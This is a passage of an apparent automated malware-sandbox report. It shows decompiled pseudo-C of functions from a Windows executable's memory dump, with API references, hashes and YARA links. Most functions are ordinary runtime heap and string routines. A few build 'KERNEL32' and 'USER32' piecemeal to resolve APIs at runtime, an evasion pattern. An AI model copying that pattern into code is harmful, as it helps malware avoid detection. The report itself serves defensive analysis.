									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E004052D9(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E00404E3F(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x40d524, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x40c26c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = E00405207(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E00404EDB(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E00405EA0(_v40, _a4, _t74);
													E00404E96(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x40d524, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E00405EA0(_v40, _t97, _t68);
												E00404E96(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E004075DD();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x40d118 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E0040534F(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x40d118 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E004052D9(9);
							_v8 = _t113;
							_t80 = E004040E4(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0040748F();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x40d524, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x40d520; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E004048ED();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E00404438();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E00405EA0(_v40, _t97, _t91);
										_t93 = E004040E4(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E0040410F();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x40d524, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E00405EA0(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E0040410F();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E0040534F(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E004027B7(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = E004028A0(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}

0x00407307
0x00407309
0x0040730e
0x00407319
0x0040731a
0x00407321
0x00407327
0x0040732a
0x0040732e
0x0040733e
0x00407341
0x00407343
0x00407351
0x00407356
0x00407359
0x00407498
0x0040749b
0x004075e8
0x004075e8
0x004075ea
0x004075ed
0x004075ef
0x004075f1
0x004075f5
0x004075f5
0x004075f9
0x004075f9
0x00407605
0x00407605
0x0040760b
0x0040760d
0x00000000
0x00000000
0x0040760f
0x00407615
0x00000000
0x00000000
0x00407618
0x0040761e
0x00407620
0x00000000
0x00000000
0x00000000
0x00407620
0x00000000
0x004075e8
0x004074a1
0x004074a4
0x004074a6
0x004074a8
0x004074b4
0x004074aa
0x004074ad
0x004074ad
0x004074b5
0x004074b5
0x004074b8
0x004074b8
0x004074bb
0x004074be
0x004074c6
0x004074cb
0x004074cc
0x004074dc
0x004074e1
0x004074e4
0x004074e6
0x004074e9
0x004074eb
0x004075ab
0x004074f1
0x004074f1
0x004074f7
0x004074fb
0x00407506
0x0040750b
0x0040750e
0x00407510
0x0040751b
0x00407521
0x00407524
0x00407526
0x0040752b
0x0040752e
0x00407531
0x00407533
0x00407535
0x00407535
0x0040753e
0x0040754a
0x0040754f
0x0040754f
0x00407512
0x00407515
0x00407515
0x00407552
0x00407552
0x00407555
0x00407559
0x00407564
0x0040756a
0x0040756d
0x0040756f
0x00407574
0x00407577
0x0040757a
0x0040757c
0x0040757e
0x0040757e
0x00407585
0x00407591
0x00407596
0x00407596
0x0040756f
0x00407559
0x004075ae
0x004075ae
0x004075ae
0x004075b2
0x004075b2
0x004075b7
0x004075ba
0x004075bc
0x00000000
0x00000000
0x004075be
0x004075c4
0x00000000
0x00000000
0x004075c7
0x004075cd
0x004075cf
0x00000000
0x00000000
0x00000000
0x004075d5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040735f
0x0040735f
0x0040735f
0x00407362
0x00407365
0x0040745c
0x0040745c
0x0040745f
0x00407461
0x00000000
0x00000000
0x00407467
0x0040746d
0x00000000
0x00000000
0x00000000
0x0040746d
0x0040736d
0x00407373
0x00407377
0x0040737d
0x00407380
0x00407382
0x0040742c
0x0040742c
0x00407430
0x00407435
0x00407438
0x0040743a
0x0040743c
0x00407440
0x00407440
0x00407444
0x00407444
0x00407447
0x00407459
0x00407459
0x00000000
0x00407438
0x00407388
0x0040738e
0x00407390
0x00407391
0x00407392
0x00407393
0x00407398
0x0040739b
0x0040739d
0x004073a4
0x004073a5
0x004073ab
0x004073ae
0x004073b0
0x004073b5
0x004073b6
0x004073b9
0x004073bb
0x004073bd
0x004073bd
0x004073c4
0x004073ca
0x004073cf
0x004073d2
0x004073d3
0x004073d4
0x004073d9
0x004073d9
0x0040739f
0x0040739f
0x0040739f
0x0040739d
0x004073dc
0x004073df
0x004073e1
0x004073e3
0x004073e7
0x004073e8
0x004073e8
0x004073ee
0x004073f1
0x004073fc
0x00407402
0x00407405
0x00407407
0x0040740c
0x0040740d
0x00407410
0x00407412
0x00407414
0x00407414
0x0040741b
0x00407420
0x00407421
0x00407424
0x00407429
0x00407429
0x00407407
0x00000000
0x00407473
0x00407474
0x0040747a
0x0040747a
0x00000000
0x00407345
0x00407346
0x00407622
0x00407622
0x00407622
0x00000000
0x00407622
0x00407330
0x00407333
0x00407624
0x00407627
0x00407632
0x00407632

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29819e5374f340cbb359dee31d16c9cb60e7f488e54644d0ec6ebdff1bbf9db0
Instruction ID: c5dd130835414943aa1900cd93d9ad1351b964cf93847c7c967d4d75393204fa
Opcode Fuzzy Hash: 29819e5374f340cbb359dee31d16c9cb60e7f488e54644d0ec6ebdff1bbf9db0
Instruction Fuzzy Hash: CA9106B1C04514AECB21AB69CD419DF7EB8EB44364F20453BF815B62D1D739AD40CAAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404BE3, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BE3() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x40a258 != 0xffffffff) {
					_t43 = HeapAlloc( *0x40d524, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x40a248;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x40a248) {
							HeapFree( *0x40d524, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x40a248) {
						 *_t43 = 0x40a248;
						_t25 =  *0x40a24c; // 0x40a248
						 *(_t43 + 4) = _t25;
						 *0x40a24c = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x40a248 == 0) {
							 *0x40a248 = 0x40a248;
						}
						if( *0x40a24c == 0) {
							 *0x40a24c = 0x40a248;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E00406750(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}

0x00404bee
0x00404c0a
0x00404c0e
0x00000000
0x00000000
0x00000000
0x00404bf0
0x00404bf0
0x00404c14
0x00404c2a
0x00404c2e
0x00404d09
0x00404d0f
0x00404d1a
0x00404d1a
0x00404d20
0x00000000
0x00404d20
0x00404c46
0x00404d03
0x00000000
0x00404d03
0x00404c53
0x00404c73
0x00404c75
0x00404c7a
0x00404c7d
0x00404c86
0x00404c55
0x00404c5c
0x00404c5e
0x00404c5e
0x00404c6a
0x00404c6c
0x00404c6c
0x00404c6a
0x00404c88
0x00404c8e
0x00404c94
0x00404c97
0x00404c97
0x00404c9a
0x00404c9d
0x00404ca0
0x00404ca3
0x00404caa
0x00404cac
0x00404cb6
0x00404cb7
0x00404cb9
0x00404cbc
0x00404cbf
0x00404ccb
0x00404cd3
0x00404cdc
0x00404ce3
0x00404ce6
0x00404ce8
0x00404cef
0x00404cef
0x00000000
0x00404cf7

APIs

HeapAlloc.KERNEL32(00000000,00002020,0040A248,0040A248,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000), ref: 00404C04
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000), ref: 00404C28
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000), ref: 00404C42
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000,?), ref: 00404D03
HeapFree.KERNEL32(00000000,00000000,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000,?,00000000), ref: 00404D1A

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: a139a282fdaf2165f2bfe5b1244df2dd12f90868bacabd89215c1e8c5bc2e03b
Instruction ID: 96af8e0c39901950113361bfb5708e0fe0783b740d2323b61ca7482b7fc257a0
Opcode Fuzzy Hash: a139a282fdaf2165f2bfe5b1244df2dd12f90868bacabd89215c1e8c5bc2e03b
Instruction Fuzzy Hash: E73103B15017019FE3308F28DD40B22B7E4EB85755F12823EE655B73E0E778A8548B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405CFE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00405CFE(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x40d2d0,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00406BB6(1,  &_v280, 0x100,  &_v1304,  *0x40d2d0,  *0x40d504, 0);
						E00406967( *0x40d504, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x40d2d0, 0);
						E00406967( *0x40d504, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x40d2d0, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x40d300) =  *(_t55 + 0x40d300) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x40d401) =  *(_t55 + 0x40d401) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x40d300) = _t77;
								goto L16;
							}
							 *(_t55 + 0x40d401) =  *(_t55 + 0x40d401) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x40d300) =  *(_t43 + 0x40d300) & 0x00000000;
						} else {
							 *(_t43 + 0x40d401) =  *(_t43 + 0x40d401) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x40d401) =  *(_t43 + 0x40d401) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x40d300) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x00405d1b
0x00405d21
0x00405d28
0x00405d28
0x00405d2f
0x00405d30
0x00405d34
0x00405d37
0x00405d40
0x00405d79
0x00405d98
0x00405dbc
0x00405de4
0x00405dec
0x00405dee
0x00405df4
0x00405df4
0x00405dfa
0x00405e15
0x00405e27
0x00000000
0x00405e27
0x00405e17
0x00405e1e
0x00405e0a
0x00405e0a
0x00000000
0x00405e0a
0x00405dfc
0x00405e03
0x00000000
0x00405e2e
0x00405e2e
0x00405e30
0x00405e31
0x00000000
0x00405df4
0x00405d44
0x00405d47
0x00405d47
0x00405d4a
0x00405d4f
0x00405d53
0x00405d5a
0x00405d62
0x00405d6c
0x00405d6c
0x00405d6c
0x00405d6f
0x00405d70
0x00405d73
0x00000000
0x00405d78
0x00405e37
0x00405e3e
0x00405e41
0x00405e5f
0x00405e74
0x00405e66
0x00405e66
0x00405e6f
0x00000000
0x00405e6f
0x00405e48
0x00405e48
0x00405e51
0x00405e54
0x00405e54
0x00405e54
0x00405e7b
0x00405e7c
0x00405e82

APIs

GetCPInfo.KERNEL32(?), ref: 00405D12

Strings

, xrefs: 00405D5B
, xrefs: 00405D37

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 91c6b86bf0cdd0c0f68328bb78e02530c482df04dcf8c73d0c98ddc2f6aa9794
Instruction ID: 8d0443081c30802040d5ab737e7d442958efbf745b2bf29103c71d6bb19445fd
Opcode Fuzzy Hash: 91c6b86bf0cdd0c0f68328bb78e02530c482df04dcf8c73d0c98ddc2f6aa9794
Instruction Fuzzy Hash: F94129314046581EEB159754DE59BFB3F99EB02704F1400F6E58AFB1D3C2394A4D8FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401F50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F50(void* __eflags) {
				short _v520;
				intOrPtr _v524;
				intOrPtr _t7;
				CHAR* _t14;

				 *_t14 = 0x52455355;
				_v524 = 0x3233;
				 *0x40cf50 = LoadLibraryA(_t14);
				E00401ED0();
				_t7 =  *0x40cf48; // 0x0
				if(_t7 != 0) {
					L3:
					return 0;
				} else {
					GetModuleFileNameW(0,  &_v520, 0x208);
					if(E004018A0( &_v520, L"-a", 1) == 0) {
						goto L3;
					} else {
						return 1;
					}
				}
			}

0x00401f5a
0x00401f63
0x00401f71
0x00401f76
0x00401f7b
0x00401f82
0x00401fba
0x00401fc2
0x00401f84
0x00401f90
0x00401fac
0x00000000
0x00401fae
0x00401fb9
0x00401fb9
0x00401fac

APIs

LoadLibraryA.KERNEL32 ref: 00401F6B

Part of subcall function 00401ED0: GetProcAddress.KERNEL32 ref: 00401EF8
Part of subcall function 00401ED0: GetConsoleWindow.KERNELBASE ref: 00401F39

GetModuleFileNameW.KERNEL32(00000000,00003233,00000208), ref: 00401F90

Part of subcall function 004018A0: LoadLibraryA.KERNELBASE(?,?,00000000), ref: 004018D8
Part of subcall function 004018A0: GetProcAddress.KERNEL32(00000000,Shel), ref: 004018E4

Strings

32, xrefs: 00401F63

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc$ConsoleFileModuleNameWindow
String ID: 32
API String ID: 3324019085-2103780943
Opcode ID: 46aac531217d429e880bb880db5e2a59e10f4db92b5c2f864625b5ee7c2b489c
Instruction ID: 9c7f662852b17ace4882b67a1fc9ec7ac7ebf9080a2010151e3d34f37eda0402
Opcode Fuzzy Hash: 46aac531217d429e880bb880db5e2a59e10f4db92b5c2f864625b5ee7c2b489c
Instruction Fuzzy Hash: 6AF05475940302ABE300DF50DD89B5A7794AB54744F84893DBA48A22E0F7FCD544865A

Uniqueness

Uniqueness Score: -1.00%

Function 00406CB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00406CB3() {
				int _t12;
				int _t13;
				void* _t20;

				 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
				if(0 == 0) {
					L4:
					_t12 = 0;
				} else {
					_t13 = MultiByteToWideChar( *(_t20 + 0x18), 1,  *(_t20 + 0xc),  *(_t20 + 0x10), 0,  *(_t20 - 0x20));
					if(_t13 == 0) {
						goto L4;
					} else {
						_t8 = _t20 + 0x14; // 0x406d59
						_t12 = GetStringTypeW( *(_t20 + 8), 0, _t13,  *_t8);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0x10));
				return _t12;
			}

0x00406cba
0x00406cc0
0x00406ceb
0x00406ceb
0x00406cc2
0x00406cd1
0x00406cd9
0x00000000
0x00406cdb
0x00406cdb
0x00406ce3
0x00406ce3
0x00406cd9
0x00406cf3
0x00406cfe

APIs

MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00406D59,?), ref: 00406CD1
GetStringTypeW.KERNEL32(?,?,00000000,Ym@,?,?,?,?,?,?,00406D59,?), ref: 00406CE3

Strings

Ym@, xrefs: 00406CDB

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringTypeWide
String ID: Ym@
API String ID: 3139900361-983799895
Opcode ID: 3cd6e0a5aaf87e07ac5ee2da931a4589a6c4811af2752385156a542494a200fd
Instruction ID: 4864dbb2f1dc6851fa6d39f1cf95cb1d28185d978e6c1f9092e5c79113f981ec
Opcode Fuzzy Hash: 3cd6e0a5aaf87e07ac5ee2da931a4589a6c4811af2752385156a542494a200fd
Instruction Fuzzy Hash: AEF05832905119AFCF218F80DE45AEEBF36FF04360F024539FA62761A0C3368920DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(CHAR* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _t4;
				CHAR* _t8;

				_t4 =  *0x40cf4c; // 0x73b60000
				 *_t8 = 0x4e52454b;
				_v8 = 0x32334c45;
				_v4 = 0;
				if(_t4 == 0) {
					_t4 = LoadLibraryA(_t8);
					 *0x40cf4c = _t4;
				}
				return GetProcAddress(_t4, _a4);
			}

0x00401003
0x00401008
0x00401012
0x0040101a
0x00401022
0x00401029
0x0040102f
0x0040102f
0x00401043

APIs

LoadLibraryA.KERNEL32(73B60000,?,?,?,?,?,?,?,?,?,00401F7B), ref: 00401029
GetProcAddress.KERNEL32(73B60000,?), ref: 0040103A

Strings

EL32, xrefs: 00401012

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: EL32
API String ID: 2574300362-3367122695
Opcode ID: 2ae5c11028faa6d09cc1856fc149f88123bfbf338145613ffade19823f03ab3e
Instruction ID: e57299af7337993e7b686878eb83ed0512805ea50c4953b9a9f89a59caef0946
Opcode Fuzzy Hash: 2ae5c11028faa6d09cc1856fc149f88123bfbf338145613ffade19823f03ab3e
Instruction Fuzzy Hash: 39E0B6B4505341AFC740DF68EB4871A7BE8BB84304F40897DEA89D7250DB34D5488F1B

Uniqueness

Uniqueness Score: -1.00%

Function 00404741, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404741() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x40d518; // 0x0
				_t26 =  *0x40d508; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x40d51c; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x40d524, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x40d518 =  *0x40d518 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x40d524, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x40d524, 0,  *0x40d51c, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x40d508 =  *0x40d508 + 0x10;
				 *0x40d51c = _t25;
				_t15 =  *0x40d518; // 0x0
				goto L3;
			}

0x00404741
0x00404746
0x00404752
0x00404784
0x00404784
0x0040479a
0x0040479d
0x004047a5
0x004047a8
0x004047d4
0x00000000
0x004047d4
0x004047b7
0x004047bf
0x004047c2
0x004047d8
0x004047dc
0x004047de
0x004047e1
0x004047ea
0x00000000
0x004047ed
0x004047ce
0x00000000
0x004047ce
0x00404754
0x00404769
0x00404771
0x00000000
0x00000000
0x00404773
0x0040477a
0x0040477f
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00404509,00000000,00000000,00000000,0040292C,00000000,00000000,?,00000000,00000000,00000000), ref: 00404769
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00404509,00000000,00000000,00000000,0040292C,00000000,00000000,?,00000000,00000000,00000000), ref: 0040479D
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004047B7
HeapFree.KERNEL32(00000000,?), ref: 004047CE

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: ff238c7abc86e0ade8ea29734b33f15928545eb4314a05c50a12ed12f92fa091
Instruction ID: a55063c2d52c13fd6a85e6346748cc6d7dbe4ad701c08372f3dbf3961b163e33
